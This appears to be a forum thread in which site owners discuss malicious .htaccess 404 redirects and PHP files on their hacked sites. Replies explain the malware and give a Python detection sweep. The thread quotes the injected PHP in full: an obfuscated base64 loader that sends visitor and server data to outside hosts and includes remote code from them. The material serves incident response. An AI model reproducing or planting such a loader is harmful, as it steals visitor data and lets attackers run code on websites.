I've got these very strange things going on throughout all my sites. It is a .htaccess file with the following content:

.htaccess

Options -MultiViews
ErrorDocument 404 //183083.php

Options -MultiViews
ErrorDocument 404 //53089.php

These PHP files then have something in them like:

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5waHB0YWdzLndz")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("c2hvcC52bWFya2V0LmluZm8=")."/?".$str);} ?>

It looks to me like someone has hacked it through an auto file upload or something like this and now tries to abuse it. Is there any way to find out what the script is which is creating these files? I set at least each folder to 755 but it's a hell of a job to find and delete them all.

That script is making one of the two following requests:

http://www3.phptags.ws/?bG9jYWxob3N...x.e.RDovd2ViL2h0ZG9jcy93aGF0LnBocA==.ZW4tdXM=
http://shop.vmarket.info/?bG9jYWxob...x.e.RDovd2ViL2h0ZG9jcy93aGF0LnBocA==.ZW4tdXM=

The garbage after the ? is base64-encoded server environment stuff including the IP, user_agent, etc. of your visitor. You could call up the owner of vmarket.info and ask him: http://www.networksolutions.com/whois/results.jsp?domain=vmarket.info

It looks like he's just remote logging your visitors if they hit a 404 page. That info will tell you exactly what page they were trying to access (and where they were referred from) when the 404 occurred.

Hi, I know this thread is old but I figured rather than making one myself I might as well just use the one you got. After checking all my sites I noticed they are all bugged with this garbage. All have different usernames and passwords but still it gets through. After doing a Google search I couldn't find a cure to stop this from happening. I had in total 10 of these. I have 755'd all the image directories I could. Do you think this will stop it?
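
A sweep for the two artifacts quoted in this thread, added here as an example and not code from any poster: it walks a web root, flags .htaccess files whose 404 handler is a numerically named PHP file, and flags PHP files that include() a base64_decode()'d string, decoding the literals so the contacted hosts are visible. The function names and finding labels are hypothetical, and the patterns assume the files look like the samples above.

```python
import base64
import os
import re
import sys

# Patterns derived from the samples quoted in this thread (an assumption:
# other variants of the dropper may differ and need their own patterns).
HTACCESS_RE = re.compile(r"^\s*ErrorDocument\s+404\s+/*(\d+\.php)\s*$", re.I | re.M)
B64_CALL_RE = re.compile(r"""base64_decode\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")
REMOTE_INCLUDE_RE = re.compile(r"include\s*\(\s*base64_decode\(", re.I)


def decode_literals(php_source):
    """Decode every string literal passed to base64_decode() in the source."""
    out = []
    for lit in B64_CALL_RE.findall(php_source):
        try:
            out.append(base64.b64decode(lit, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            out.append("<undecodable:%s>" % lit)
    return out


def scan(root):
    """Walk root and return (path, kind, detail) for each suspicious file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name != ".htaccess" and not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip it, do not abort the sweep
            if name == ".htaccess":
                for target in HTACCESS_RE.findall(text):
                    findings.append((path, "htaccess-404-handler", target))
            elif REMOTE_INCLUDE_RE.search(text):
                findings.append((path, "php-remote-include", decode_literals(text)))
    return findings


if __name__ == "__main__":
    # Usage: python sweep.py /path/to/webroot   (defaults to the current directory)
    for path, kind, detail in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(kind, path, detail, sep="\t")
```

Comparing the modification times of the flagged files against the web server access log for the same window is one way to narrow down which script wrote them.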